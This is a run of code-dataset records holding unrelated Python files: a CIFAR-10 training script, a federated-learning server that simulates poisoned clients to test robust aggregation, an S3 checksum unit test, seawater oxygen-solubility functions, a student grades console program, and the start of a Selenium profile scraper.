[4, 4]\n\n nn.Conv2d(256, 256, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False),\n nn.BatchNorm2d(256, eps=1e-05, momentum=0.1),\n nn.ReLU(),\n nn.MaxPool2d(kernel_size=2, stride=2, padding=0, 
dilation=1),\n )\n self.fc = nn.Sequential(\n nn.Linear(1024, 256, bias=True),\n nn.ReLU(),\n nn.Linear(256, 10, bias=True),\n )\n\n def forward(self, img):\n tmp_data = self.layers(img)\n output = self.fc(tmp_data.reshape(tmp_data.size(0), -1))\n return output\n\n\ntrain_transform = transforms.Compose([\n transforms.ToPILImage(),\n transforms.Scale(40),\n transforms.RandomHorizontalFlip(),\n transforms.RandomCrop(32),\n transforms.ToTensor(),\n transforms.Normalize([0.5, 0.5, 0.5], [0.5, 0.5, 0.5])\n])\ntest_transform = transforms.Compose([\n transforms.ToPILImage(),\n transforms.ToTensor(),\n transforms.Normalize(mean=(0.5, 0.5, 0.5), std=(0.5, 0.5, 0.5))\n])\n\nBATCH_SIZE = 64\nLR = 0.005\nWEIGHT_DECAY = 0.05\nMOMENTUM = 0.9\nNUM_EPOCH = 30\n\ntrain_data = []\ntrain_label = []\ndata_dir = 'data/cifar_10'\nfor i in range(5):\n batch_data = unpickle(data_dir + '/data_batch_' + str(i + 1))\n train_data.append(batch_data[b'data'].reshape(-1, 32, 32, 3))\n train_label.append(np.array(batch_data[b'labels']))\ntrain_data = np.concatenate(train_data, axis=0)\ntrain_label = np.concatenate(train_label, axis=0)\n\nbatch_data = unpickle('data/cifar_10/test_batch')\ntest_data = batch_data[b'data'].reshape(-1, 32, 32, 3)\ntest_label = np.array(batch_data[b'labels'])\n\ntrain_set = ImgDataset(train_data, train_label, train_transform, 'cuda')\ntrain_loader = DataLoader(train_set, batch_size=BATCH_SIZE, shuffle=True)\ntest_set = ImgDataset(test_data, test_label, test_transform, 'cuda')\ntest_loader = DataLoader(test_set, batch_size=BATCH_SIZE, shuffle=False)\n\nmodel = MY_MODULE().cuda()\nloss_fn = nn.CrossEntropyLoss().cuda()\noptimizer = torch.optim.SGD(model.parameters(), lr=LR, momentum=MOMENTUM, weight_decay=WEIGHT_DECAY)\n\nfor epoch in range(NUM_EPOCH):\n model.train()\n train_cor = 0\n train_tot = 0\n for i, data in enumerate(train_loader):\n optimizer.zero_grad()\n output = model(data[0])\n loss = loss_fn(output, data[1])\n loss.backward()\n optimizer.step()\n train_cor += eval_acc(output, data[1])\n train_tot += len(data[0])\n if i % 50 == 49:\n print('epoch:{:d}, step:{:d}, loss={:.4f}'.format(epoch, i + 1, loss), end='\\r')\n\n model.eval()\n test_cor = 0\n test_tot = 0\n with torch.no_grad():\n for i, data in enumerate(test_loader):\n output = model(data[0])\n test_cor += eval_acc(output, data[1])\n test_tot += len(data[0])\n print('epoch {:d}/{:d}, loss={:.4f}, train_acc={:.2f}, test_acc={:.2f}'.format(epoch, NUM_EPOCH, loss,\n train_cor / train_tot * 100,\n test_cor / test_tot * 100))","sub_path":"homework_01/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":4865,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"526075166","text":"import pickle\nimport uuid\nimport torch\nimport random\nimport codecs\nimport numpy as np\nimport datetime\nimport argparse\nimport gc\nimport tensorflow as tf\nfrom attention import Attention\nimport datasource\nfrom models import GlobalModel, GlobalModel_MNIST_CNN, RESNET18_MODEL, LENET5_MODEL, LENET5_MODEL_FEMNIST\nfrom fl_client import FederatedClient\nfrom datasource import Mnist\nclass FLServer(object):\n\n MIN_NUM_WORKERS = 4\n # MIN_NUM_WORKERS = 10\n\n # MAX_NUM_ROUNDS = 100\n MAX_NUM_ROUNDS = 36\n NUM_CLIENTS_CONTACTED_PER_ROUND = 4\n # NUM_CLIENTS_CONTACTED_PER_ROUND = 10\n\n ROUNDS_BETWEEN_VALIDATIONS = 1\n # LENET5_MODEL_FEMNIST, \"127.0.0.1\", 5000, gpu, output=args.output, aggregation=args.aggregation\n def __init__(self, global_model,aggregation=\"normal_atten\"):\n # 
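# --- Editor's aside (illustrative addition, not part of the original source) ---
# The aggregation this server performs in handle_client_update below boils
# down to a weighted average of per-layer client weight arrays. A minimal
# numpy sketch of that idea; `weighted_average` is an invented name, and the
# real logic lives in GlobalModel.update_weights_with_attention.
import numpy as np

def weighted_average(client_weights, attention):
    # client_weights: one list of per-layer arrays per client
    # attention: one non-negative score per client
    att = np.asarray(attention, dtype=float)
    att = att / att.sum()  # normalize the scores so they sum to 1
    n_layers = len(client_weights[0])
    return [sum(att[c] * client_weights[c][layer]
                for c in range(len(client_weights)))
            for layer in range(n_layers)]

# Usage: weighted_average([[np.ones(2)], [np.zeros(2)]], [1.0, 3.0])
# -> [array([0.25, 0.25])]
# --- end aside ---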
FLServer(GlobalModel_MNIST_CNN, \"127.0.0.1\", 5000, gpu)\n\n # os.environ['CUDA_VISIBLE_DEVICES'] = '%d'%gpu\n self.global_model = global_model()\n self.ready_client_sids = set()\n\n # self.host = host\n # self.port = port\n self.client_resource = {}\n\n self.wait_time = 0\n\n self.model_id = str(uuid.uuid4())\n\n self.aggregation = aggregation\n self.attention_mechanism = Attention()\n #####\n # training states\n self.current_round = -1 # -1 for not yet started\n self.current_round_client_updates = []\n self.eval_client_updates = []\n #####\n\n self.invalid_tolerate = 0\n\n\n def handle_client_update(self, data):\n\n self.current_round_client_updates = data\n uploaded_weights = [ x['weights'] for x in self.current_round_client_updates ]\n\n if self.aggregation in [\"normal_atten\", \"atten\", \"rule_out\"]:\n\n if self.aggregation == \"normal_atten\":\n # Same atttention\n print(\"### Update with normal attention mechanism! ###\")\n attention = np.tile( np.array([1.0]), len(uploaded_weights) )\n else:\n print(\"### Update with calculated attention mechanism! ###\")\n # attention = self.attention_mechanism.cal_weights(np.array( uploaded_weights ))\n attention = self.attention_mechanism.cal_weights(np.array( uploaded_weights ))\n print(\"old attention\", attention)\n # type(attention): shape (10, )\n\n if self.aggregation == \"rule_out\":\n # Rule out\n new_attention = np.zeros(attention.shape)\n for idx in range(len(attention)):\n if attention[idx] > np.mean(attention):\n new_attention[idx] = 1.0\n attention = new_attention\n print(\"new attention\", attention)\n\n\n attack_label = [ \"{}_{}\".format(x['attack_mode'], x['assigned_label'])\n for x in self.current_round_client_updates ]\n self.global_model.update_weights_with_attention(\n uploaded_weights,\n [x['train_size'] for x in self.current_round_client_updates],\n attention,\n attack_label\n )\n \n else:\n print(\"### Update with baseline methods! 
###\")\n self.global_model.update_weights_baseline(\n uploaded_weights,\n [x['train_size'] for x in self.current_round_client_updates],\n self.aggregation\n )\n\n aggr_train_loss, aggr_train_accuracy = self.global_model.aggregate_train_loss_accuracy(\n [x['train_loss'] for x in self.current_round_client_updates],\n [x['train_accuracy'] for x in self.current_round_client_updates],\n [x['train_size'] for x in self.current_round_client_updates],\n self.current_round\n )\n if self.global_model.prev_train_loss is not None and self.global_model.prev_train_loss < aggr_train_loss:\n self.invalid_tolerate = self.invalid_tolerate + 1\n else:\n self.invalid_tolerate = 0\n self.global_model.prev_train_loss = aggr_train_loss\n\n def handle_client_eval(self, data):\n if self.eval_client_updates is None:\n return\n\n self.eval_client_updates = data\n\n # tolerate 30% unresponsive clients\n\n aggr_test_loss, aggr_test_accuracy = self.global_model.aggregate_loss_accuracy(\n [x['test_loss'] for x in self.eval_client_updates],\n [x['test_accuracy'] for x in self.eval_client_updates],\n [x['test_size'] for x in self.eval_client_updates],\n )\n print(\"\\n--------Aggregating test loss---------\\n\")\n print(\"aggr_test_loss\", aggr_test_loss)\n print(\"aggr_test_accuracy\", aggr_test_accuracy)\n print(\"best model at round \", self.global_model.best_round, \", get the best loss \", self.global_model.best_loss)\n print(\"== done ==\")\n self.eval_client_updates = None # special value, forbid evaling again\n\n\n # Note: we assume that during training the #workers will be >= MIN_NUM_WORKERS\n def train_next_round(self, clients):\n\n self.current_round += 1\n # buffers all client updates\n self.current_round_client_updates = []\n\n print(\"\\n ### Round \", self.current_round, \"### \\n\")\n\n # print(\"request updates from\", client_sids_selected)\n # by default each client cnn is in its own \"room\"\n\n # path = os.path.join(\"../\",'saved_weights', 'iteration_' + str(self.current_round))\n # if not os.path.exists(path):\n # os.makedirs(path)\n # np.save( os.path.join(path, \"server_weights\"), self.global_model.current_weights)\n\n train_next_round_info = {\n 'model_id': self.model_id,\n 'round_number': self.current_round,\n # 'current_weights': obj_to_pickle_string(self.global_model.current_weights),\n 'current_weights': self.global_model.current_weights,\n 'weights_format': 'not pickle',\n 'run_validation': self.current_round % FLServer.ROUNDS_BETWEEN_VALIDATIONS == 0,\n }\n return train_next_round_info\n\n def stop_and_eval(self):\n self.eval_client_updates = []\n for rid in self.ready_client_sids:\n #emit('stop_and_eval', {\n #\t\t'model_id': self.model_id,\n #\t\t'current_weights': obj_to_pickle_string(self.global_model.current_weights),\n #\t\t'weights_format': 'pickle'\n #\t}, room=rid)\n self.emit('stop_and_eval', {\n 'model_id': self.model_id,\n # 'current_weights': obj_to_pickle_string(self.global_model.best_weight),\n 'current_weights': self.global_model.best_weight,\n 'weights_format': 'not pickle'\n }, room=rid)\n\n # def start(self):\n # \tself.socketio.run(self.app, host=self.host, port=self.port, log_output=False)\n\ndef obj_to_pickle_string(x):\n return codecs.encode(pickle.dumps(x), \"base64\").decode()\n # return msgpack.packb(x, default=msgpack_numpy.encode)\n # TODO: compare pickle vs msgpack vs json for serialization; tradeoff: computation vs network IO\n\ndef pickle_string_to_obj(s):\n return pickle.loads(codecs.decode(s.encode(), \"base64\"))\n\ndef str2bool(v):\n if v.lower() in ('yes', 
'true', 't', 'y', '1'):\n        return True\n    elif v.lower() in ('no', 'false', 'f', 'n', '0'):\n        return False\n    else:\n        raise argparse.ArgumentTypeError('Unsupported value encountered!')\ndef test(info, x_test, y_test, aggregation, train=True, iid=True):\n\n    # device = torch.device(\"cpu\")\n    model_ = GlobalModel_MNIST_CNN()\n    model = model_.build_model()\n    model.set_weights(info['current_weights'])\n    score = model.evaluate(x_test, y_test, verbose=1)\n    if train:\n        if iid:\n            with open(aggregation + '_minist_iid_train_acc_results.txt', 'a') as file_handle:\n                file_handle.write(str(score[1]))\n                file_handle.write('\\n')\n        else:\n            with open(aggregation + '_minist_noniid_train_acc_results.txt', 'a') as file_handle:\n                file_handle.write(str(score[1]))\n                file_handle.write('\\n')\n    else:\n        if iid:\n            with open(aggregation + '_minist_iid_test_acc_results.txt', 'a') as file_handle:\n                file_handle.write(str(score[1]))\n                file_handle.write('\\n')\n        else:\n            with open(aggregation + '_minist_noniid_test_acc_results.txt', 'a') as file_handle:\n                file_handle.write(str(score[1]))\n                file_handle.write('\\n')\n    return score\n\ndef make_print_to_file(path='./'):\n    '''\n    Redirect everything written by print() into a dated log file under `path`.\n    Example: call make_print_to_file() once at startup and all subsequent\n    print() output will also be written to the log file.\n    :return: None\n    '''\n    import sys\n    import os\n    # import config_file as cfg_file\n    import datetime\n\n    class Logger(object):\n        def __init__(self, filename=\"Default.log\", path=\"./\"):\n            self.terminal = sys.stdout\n            self.log = open(os.path.join(path, filename), \"a\", encoding='utf8', )\n\n        def write(self, message):\n            self.terminal.write(message)\n            self.log.write(message)\n\n        def flush(self):\n            pass\n\n    fileName = datetime.datetime.now().strftime('day' + '%Y_%m_%d')\n    sys.stdout = Logger(fileName + '.log', path=path)\n\n    #############################################################\n    # everything printed after this point is also written to the log\n    #############################################################\n    print(fileName.center(60, '*'))\n\n\nif __name__ == '__main__':\n    random.seed(1)\n    np.random.seed(1)\n    make_print_to_file(path='./')\n    Minst_1 = Mnist(20,10)\n    writers_all = Minst_1.partitioned_by_rows(num_workers=10)\n    # writers = writers_all[\"train\"]  # iid data\n    writers = Minst_1.client()  # non-iid data\n    # data = datasource.MINSIT_NONIID()\n    train_x,train_y = Minst_1.global_train()[0],Minst_1.global_train()[1]\n    data_test = Minst_1.test_data()\n    x_test, y_test = data_test[0],data_test[1]\n    # writers = data.client()\n    # print(len(writers))\n    parser = argparse.ArgumentParser()\n    parser.add_argument('--gpu', \t\t type=int, default = 0)\n    parser.add_argument('--aggregation', \ttype=str, \n                        choices = [\"normal_atten\", \"atten\", \"rule_out\", \"TrimmedMean\", \"Krum\", \"GeoMed\"],\n                        default = \"Krum\")\n    parser.add_argument('--output', \t type=str, default = \"stats.txt\")\n    parser.add_argument(\"--batch_size\", type=int, default = 100)\n    parser.add_argument(\"--local_epoch\", type=int, default = 1)\n    parser.add_argument(\"--select_ratio\", type=float, default = 1)\n    parser.add_argument(\"--attack_mode\", type=int, default = 3)\n    parser.add_argument(\"--attack_ratio\", type=float, default = 0.2)\n    args = parser.parse_args()\n    gpu = args.gpu\n\n    # if gpu != -1:\n    #     os.environ['CUDA_VISIBLE_DEVICES'] = '%d'%gpu\n    #     K.tensorflow_backend._get_available_gpus()\n    #\n    #     config = tf.ConfigProto( device_count = {'GPU': 1, 'CPU':10} )\n    #     sess = tf.Session(config=config)\n    #     keras.backend.set_session(sess)\n\n    print(\"##### Arguments 
#####\")\n print(args)\n print(\"##########\")\n NUM_CLIENT = int( len(writers) * args.select_ratio )\n MAX_NUM_ROUNDS = 50\n server = FLServer(GlobalModel_MNIST_CNN, aggregation=args.aggregation)\n acc_avg = 0\n train_acc = {}\n test_loss = {}\n test_acc = {}\n for cur_round in range(MAX_NUM_ROUNDS):\n\n temp_session = tf.Session()\n # tf.compat.v1.disable_v2_behavior()\n # tf.compat.v1.disable_eager_execution()\n with temp_session.as_default():\n with temp_session.graph.as_default():\n\n ##### Prepare and Select Clients #####\n clients = []\n selected_writers = np.random.choice( len(writers), size=NUM_CLIENT, replace=False )\n \n attack_mode = [0] * len(selected_writers)\n attack_number = int( args.attack_ratio * len(selected_writers) ) \n for attack_idx in range(attack_number):\n attack_mode[attack_idx] = args.attack_mode\n print(\"Selected Writers\", selected_writers, len(selected_writers))\n print(\"Attack Modes\", attack_mode)\n\n# feiminst数据集使用\n# for selected_idx in range(len(selected_writers)):\n# clients.append( FederatedClient(\"127.0.0.1\", 5000, datasource.Mnist, gpu,\n# attack_mode[selected_idx], writer=writers[ selected_writers[selected_idx] ]) )\n for selected_idx in range(len(selected_writers)):\n clients.append(FederatedClient(gpu,\\\n attack_mode[selected_idx], writer=writers[ selected_writers[selected_idx] ], number=selected_writers[selected_idx]) )\n init_info = {\n # 'model_json': server.global_model.model.to_json(),\n 'model_json': server.global_model.model,\n 'model_id': server.model_id,\n 'min_train_size': 500,\n 'data_split': (0.6, 0.3, 0.1), # train, test, valid\n 'epoch_per_round': args.local_epoch,\n 'batch_size': args.batch_size,\n 'request_sid': \"rid\", #request.sid,\n }\n\n for client in clients:\n client.on_init( init_info )\n ########\n\n train_next_round_info = server.train_next_round( clients )\n\n clients_resp = []\n for client_idx in range(len(clients)):\n print( \"Round {}/{} Client {}/{} is training TIME: {}\".format(cur_round, MAX_NUM_ROUNDS, client_idx, NUM_CLIENT, datetime.datetime.now().strftime('%m-%d %H:%M:%S')) )\n clients_resp.append( clients[client_idx].on_request_update(train_next_round_info) )\n print( \"-------------------------------------------\" )\n temp_session.close()\n # for i in clients_resp:\n # acc_avg =\n # acc_avg = sum(d['train_accuracy'] for d in clients_resp)/len(clients_resp)\n # if cur_round not in\n # train_acc[cur_round] = acc_avg\n # acc_avg = sum(clients_resp[i]['train_accuracy'])/len(clients_resp) for i in range(len(clients_resp))\n score_test = test(train_next_round_info, x_test, y_test,args.aggregation,train=False,iid=False)\n score_train = test(train_next_round_info, train_x,train_y, args.aggregation,train=True,iid=False)\n # test_loss[cur_round] = score[0]\n test_acc[cur_round] = score_test[1]\n train_acc[cur_round] = score_train[1]\n print('test_acc:',score_test[1])\n print('train_acc:',score_test[1])\n server.handle_client_update(clients_resp)\n while len(clients) != 0:\n del clients[0]\n del clients\n del clients_resp\n for _ in range(20):\n gc.collect()\n print('train_acc:',train_acc)\n print('test_loss:',test_loss)\n print('test_acc:',test_acc)\n\n\n # print(train_acc)\n\n\n # stop_and_eval_info = {\n # 'model_id': server.model_id,\n # # 'current_weights': obj_to_pickle_string(server.global_model.best_weight),\n # 'current_weights': server.global_model.best_weight,\n # 'weights_format': 'not_pickle'\n # }\n # clients_stop_and_eval_resp = []\n # print( \"\\n-------------------Run Testing-------------------\" 
)\n # ##### Prepare and Select Clients #####\n # clients = []\n # selected_writers = np.random.choice( len(writers), size=NUM_CLIENT, replace=False )\n #\n # attack_mode = [0] * len(selected_writers)\n # attack_number = int( args.attack_ratio * len(selected_writers) )\n # for attack_idx in range(attack_number):\n # attack_mode[attack_idx] = args.attack_mode\n # print(\"Selected Writers\", selected_writers, len(selected_writers))\n # print(\"Attack Modes\", attack_mode)\n #\n # for selected_idx in range(len(selected_writers)):\n # clients.append( FederatedClient(\"127.0.0.1\", 5000, datasource.FEMNIST, gpu,\n # attack_mode[selected_idx], writer=writers[ selected_writers[selected_idx] ]) )\n #\n # init_info = {\n # 'model_json': server.global_model.model.to_json(),\n # 'model_id': server.model_id,\n # 'min_train_size': 500,\n # 'data_split': (0.6, 0.3, 0.1), # train, test, valid\n # 'epoch_per_round': args.local_epoch,\n # 'batch_size': args.batch_size,\n # 'request_sid': str(12313), #request.sid,\n # }\n #\n # for client in clients:\n # client.on_init( init_info )\n # ########\n # for client_idx in range(len(clients)):\n # print( \"Client {} is runnng testing\".format(client_idx) )\n # clients_stop_and_eval_resp.append( client.on_stop_and_eval(stop_and_eval_info) )\n # print( \"-------------------------------------------\" )\n #\n #server.handle_client_eval(clients_stop_and_eval_resp)\n\n\n\n\n \n\n","sub_path":"Theroy/Krum_minist_noiid/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":17616,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"551768546","text":"import uuid\n\nimport boto3\n\nfrom .. import UploadTestCaseUsingMockAWS\nfrom ... import FixtureFile\n\nfrom upload.common.upload_area import UploadArea\nfrom upload.common.dss_checksums import DssChecksums\n\n\nclass TestDssChecksums(UploadTestCaseUsingMockAWS):\n\n def setUp(self):\n super().setUp()\n\n self.upload_area_id = str(uuid.uuid4())\n self.upload_area = UploadArea(self.upload_area_id)\n self.upload_area.update_or_create()\n\n self.checksum_id = str(uuid.uuid4())\n self.job_id = str(uuid.uuid4())\n\n self.s3client = boto3.client('s3')\n\n def tearDown(self):\n super().tearDown()\n\n def test_it_acts_like_a_dict(self):\n checksums = DssChecksums(s3_object=None, checksums={'crc32c': 'a', 'sha1': 'b', 'sha256': 'c', 's3_etag': 'd'})\n self.assertEqual(4, len(checksums))\n self.assertEqual('b', checksums['sha1'])\n self.assertIn('sha256', checksums)\n self.assertEqual(['crc32c', 's3_etag', 'sha1', 'sha256'], sorted(checksums.keys()))\n\n def test_are_present__for_an_object_with_no_checksums__returns_false(self):\n filename = 'file1'\n s3obj = self.mock_upload_file_to_s3(self.upload_area_id, filename, checksums={})\n\n self.assertFalse(DssChecksums(s3_object=s3obj).are_present())\n\n def test_are_present__for_an_object_with_partial_checksums__returns_false(self):\n filename = 'file2'\n s3obj = self.mock_upload_file_to_s3(self.upload_area_id, filename, checksums={\n 'sha1': '1',\n 'sha256': '2'\n })\n\n self.assertFalse(DssChecksums(s3_object=s3obj).are_present())\n\n def test_are_present__for_an_object_with_all_checksums__returns_true(self):\n filename = 'file3'\n s3obj = self.mock_upload_file_to_s3(self.upload_area_id, filename, checksums={\n 'sha1': '1',\n 'sha256': '2',\n 's3_etag': '3',\n 'crc32c': '4'\n })\n\n self.assertTrue(DssChecksums(s3_object=s3obj).are_present())\n\n def test_init_reads_checksums_from_s3_object(self):\n s3obj = 
self.create_s3_object(object_key=\"file4\")\n        tagging = [\n            {'Key': 'hca-dss-sha1', 'Value': '1'},\n            {'Key': 'hca-dss-sha256', 'Value': '2'},\n            {'Key': 'hca-dss-crc32c', 'Value': '3'},\n            {'Key': 'hca-dss-s3_etag', 'Value': '4'}\n        ]\n        self.s3client.put_object_tagging(Bucket=s3obj.bucket_name,\n                                         Key=s3obj.key,\n                                         Tagging={'TagSet': tagging})\n\n        checksums = DssChecksums(s3_object=s3obj)\n\n        self.assertEqual({'crc32c': '3', 'sha1': '1', 'sha256': '2', 's3_etag': '4'}, checksums)\n\n    def test_compute(self):\n        test_file = FixtureFile.factory(\"foo\")\n        s3obj = self.mock_upload_file_to_s3(self.upload_area_id, test_file.name, contents=test_file.contents)\n\n        self.assertEqual(DssChecksums(s3_object=s3obj).compute(), test_file.checksums)\n\n    def test_save_as_tags_on_s3_object(self):\n        s3obj = self.create_s3_object(object_key=\"foo\")\n\n        checksums = DssChecksums(s3obj, checksums={'sha1': 'a', 'sha256': 'b', 'crc32c': 'c', 's3_etag': 'd'})\n        checksums.save_as_tags_on_s3_object()\n\n        self.assertEqual(\n            [\n                {'Key': 'hca-dss-sha1', 'Value': 'a'},\n                {'Key': 'hca-dss-sha256', 'Value': 'b'},\n                {'Key': 'hca-dss-crc32c', 'Value': 'c'},\n                {'Key': 'hca-dss-s3_etag', 'Value': 'd'}\n            ],\n            self.s3client.get_object_tagging(Bucket=self.upload_area.bucket_name, Key=s3obj.key)['TagSet'])\n","sub_path":"tests/unit/common/test_dss_checksums.py","file_name":"test_dss_checksums.py","file_ext":"py","file_size_in_byte":3628,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"181071044","text":"#!/usr/bin/python\n\nimport numpy as np\n\ndef oxy_sol(S, T, unit='micromole/kg'):\n    '''\n    Calculate oxygen saturation concentration in seawater as a function of\n    S & T, in equilibrium with standard composition moist air at 1atm total\n    pressure. From Garcia & Gordon (1992) eq. 8 (p. 1310) using coefficients\n    of Benson & Krause in table 1, as used in Sarmiento & Gruber's \"Ocean\n    Biogeochemical Dynamics\" ch. 3, p. 81, table 3.2.4.\n    \n    INPUT:\n    S: salinity, psu\n    T: temperature, deg C\n    unit: micromole/kg or millimole/m3, default is micromole/kg\n    \n    OUTPUT:\n    O2sol: oxygen solubility, unit same as input unit\n    \n    AUTHOR:   Christopher Gordon\n    Fisheries and Oceans Canada\n    chris.gordon@dfo-mpo.gc.ca\n    \n    ACKNOWLEDGEMENT: this code is adapted from the SOCCOM SAGE_O2Argo matlab\n    code, available via https://github.com/SOCCOM-BGCArgo/ARGO_PROCESSING,\n    written by Josh Plant\n    \n    LAST UPDATE: 21-04-2020\n    \n    CHANGE LOG:\n    '''\n\n    # check for improper units\n    if unit != 'micromole/kg' and unit != 'millimole/m3':\n        raise ValueError('Unrecognized unit string - valid units are ''micromole/kg'' or ''millimole/m3''.')\n\n    if unit == 'micromole/kg':\n        A = [3.80369, -9.86643e-2, 5.10006, 4.17887, 3.20291, 5.80871]\n        B = [-9.51519e-3, -1.13864e-2, -7.70028e-3, -7.01577e-3]\n        C = -2.75915e-7\n\n    elif unit == 'millimole/m3':\n        A = [3.88767, -0.256847, 4.94457, 4.05010, 3.22014, 2.00907]\n        B = [-8.17083e-3, -1.03410e-2, -7.37614e-3, -6.24523e-3]\n        C = -4.88682e-7\n\n    # Scaled temperature\n    Ts = np.log((298.15 - T)/(273.15 + T));\n    L = np.polyval(A,Ts) + S*np.polyval(B,Ts) + C*S**2\n\n    O2sol = np.exp(L)\n\n    return O2sol\n\ndef pH2O(T):\n    '''\n    Calculate vapor pressure of water\n    \n    INPUT:\n    T: temperature, deg C\n    \n    OUTPUT:\n    vapor_pressure: vapor pressure of water, Pa\n    \n    AUTHOR:   Christopher Gordon\n    Fisheries and Oceans Canada\n    chris.gordon@dfo-mpo.gc.ca\n    \n    LAST UPDATE: 06-05-2020\n    \n    CHANGE LOG:\n    '''\n    \n    # temperature in kelvin\n    Tk = T + 273.15\n\n    # from Johnson et al. 
(2015)\n vapor_pressure = np.exp(52.57 - (6690.9/Tk) - 4.681*np.log(Tk))\n\n return vapor_pressure\n\ndef pO2(DOXY, S, T):\n\n # temperature in kelvin\n Tk = T + 273.15\n # scaled temperature\n Ts = np.log((298.15 - T)/Tk)\n\n # Benson & Krause (cm^3/dm^3)\n # temperature coefficients\n pA = [3.88767, -0.256847, 4.94457, 4.05010, 3.22014, 2.00907]\n # salinity coefficients\n pB = [-8.17083e-3, -1.03410e-2, -7.37614e-3, -6.24523e-3]\n Co = -4.88682e-7\n O2_volume = 22.3916\n XO2 = 0.20946\n\n # Used for conversions from [O2] to pO2:\n p1 = np.polyval(pB,Ts)\n S_corr = S*p1 + Co*S**2\n L = np.polyval(pA,Ts) + S_corr;\n # Oxygen solubility real gas, mmol/m3\n O2sol = (1000/O2_volume) * np.exp(L)\n\n PPOX_DOXY = DOXY/O2sol * (1013.25 - pH2O(T)) * XO2\n\n return PPOX_DOXY\n\ndef atmos_pO2(P, pH2O):\n # molar fraction of oxygen in air\n XO2 = 0.20946\n # reference partial pressure of oxygen in air\n ppox = (P - pH2O) * XO2\n\n return ppox","sub_path":"build/lib/bgcArgo/unit.py","file_name":"unit.py","file_ext":"py","file_size_in_byte":3245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"405095611","text":"#!/usr/bin/env python3\r\n# -*- coding: utf-8 -*-\r\n\r\nfrom datetime import date\r\nimport sys\r\n\r\n\r\ndef add():\r\n name = input(\"Фамилия и инициалы \")\r\n post = input(\"Номер группы \")\r\n a = int(input(\"Русский язык \"))\r\n b = int(input(\"Математика \"))\r\n c = int(input(\"Информатика \"))\r\n d = int(input(\"История \"))\r\n e = int(input(\"Физика \"))\r\n student = {\r\n 'name': name,\r\n 'post': post,\r\n 'a': a,\r\n 'b': b,\r\n 'c': c,\r\n 'd': d,\r\n 'e': e,\r\n }\r\n students.append(student)\r\n if len(students) > 1:\r\n students.sort(key=lambda item: item.get('name', ''))\r\n\r\ndef list():\r\n for idx, student in enumerate(students, 1):\r\n print(\r\n '{:>7}: ФИО: {}, Номер группы: {}, Русский язык: {}, Математика: {}, Информатика: {}, История: {}, Физика: {};'.format(\r\n idx,\r\n student.get('name', ''), student.get('post', ''), student.get('a', 0),\r\n student.get('b', 0), student.get('c', 0),\r\n student.get('d', 0), student.get('e', 0)))\r\n\r\ndef bad():\r\n count = 0\r\n for student in students:\r\n if (student.get('a') == 2) or (student.get('b') == 2) or (student.get('c') == 2) \\\r\n or (student.get('d') == 2) or (student.get('e') == 2):\r\n count += 1\r\n print('{:>4}: {}'.format(count, student.get('name', '')))\r\n if count == 0:\r\n print(\"Таких студентов не выявлено.\")\r\n\r\ndef help():\r\n print(\"Список команд:\\n\")\r\n print(\"add - Добавить студента;\")\r\n print(\"list - Список студентов;\")\r\n print(\"bad - Студенты с плохой успеваемостью;\")\r\n print(\"help - отобразить справку;\")\r\n print(\"end - завершить работу с программой.\")\r\n\r\n\r\nif __name__ == '__main__':\r\n students = []\r\n while True:\r\n command = input(\">>> \").lower()\r\n if command == 'end':\r\n break\r\n elif command == 'add':\r\n add()\r\n elif command == 'list':\r\n list()\r\n elif command == 'bad':\r\n bad()\r\n elif command == 'help':\r\n help()\r\n else:\r\n print(f\"Неизвестная команда {command}\", file=sys.stderr)","sub_path":"ind1.py","file_name":"ind1.py","file_ext":"py","file_size_in_byte":2459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"629582630","text":"# -*- coding: utf-8 -*-\nimport requests\nfrom selenium import webdriver\nfrom bs4 import BeautifulSoup\nfrom ua import get_ua\nimport traceback\nimport time\nimport datetime\nimport 
re\nimport pymysql\nimport random\n\nconn = pymysql.connect(host='*****',user='root',passwd='*****',db='spiderdata',port=3306,charset='utf8')\ncur = conn.cursor()\ndriver =webdriver.Chrome('./chromedriver')\nfile = open('full_page.html','r')\nsoup = BeautifulSoup(file, 'html.parser')\nman_soup = soup.find('div',attrs={\"class\":\"account-list\"})\nlis = man_soup.find_all('li')\ndaren_index = \"http://******userId=\"  # user page base URL (host masked in source)\ncount = 0\nfor li in lis:\n    if count < (457 + 600 + 836):\n        count +=1\n        continue\n    try:\n        daren_url = \"\"\n        button = li.find('button')\n        #darenId\n        uid = ''\n        uid = button.get('data-userid')\n        #uid = \"2278640513\"\n        daren_url = daren_index + uid\n        driver.get(daren_url)\n        time.sleep(2+random.random())\n        html = driver.page_source\n        soup = BeautifulSoup(html, 'html.parser')\n        ###darenPic \n        man_soup = soup.find('div',attrs={\"id\":\"app\"})\n        try:\n            sub_soup = man_soup.find_all('div')\n            darenPic = sub_soup[1].get('style').split('\\\"')[1]\n            p=re.compile(r'_\\d{3}x\\d{3}')\n            darenPic = 'http:' + p.split(darenPic)[0]\n        except:\n            darenPic = ''\n        '''\n        try:\n            sub_soup = man_soup.find_all('li')\n            darenNick = sub_soup[0].find_all('span')[1].text.strip()\n        except:\n            darenNick = ''\n        ###\n        try:\n            authInfo = sub_soup[2].find_all('span')[1].text.strip()\n        except:\n            authInfo = ''\n        ###\n        try:\n            darenDesc = sub_soup[3].find_all('span')[1].text.strip()\n        except:\n            darenDesc = ''\n        '''\n\n        darenNick = ''\n        authInfo = ''\n        darenDesc = ''\n        sub_soup = man_soup.find_all('li')\n        for li in sub_soup:\n            try:\n                if u'昵称' in li.find_all('span')[0].text.strip():\n                    darenNick = li.find_all('span')[1].text.strip()\n                elif u'认证信息' in li.find_all('span')[0].text.strip():\n                    authInfo = li.find_all('span')[1].text.strip()\n                elif u'个人简介' in li.find_all('span')[0].text.strip():\n                    darenDesc = li.find_all('span')[1].text.strip()\n            except:\n                continue\n        ###\n        darenHomeUrl = \"http://****/home/\" + uid + '/'\n        ### \n        updateTime = datetime.datetime.now().strftime('%y-%m-%d %H:%M:%S');\n        '''\n        print(uid)\n        print(darenNick)\n        print(darenPic)\n        print(authInfo)\n        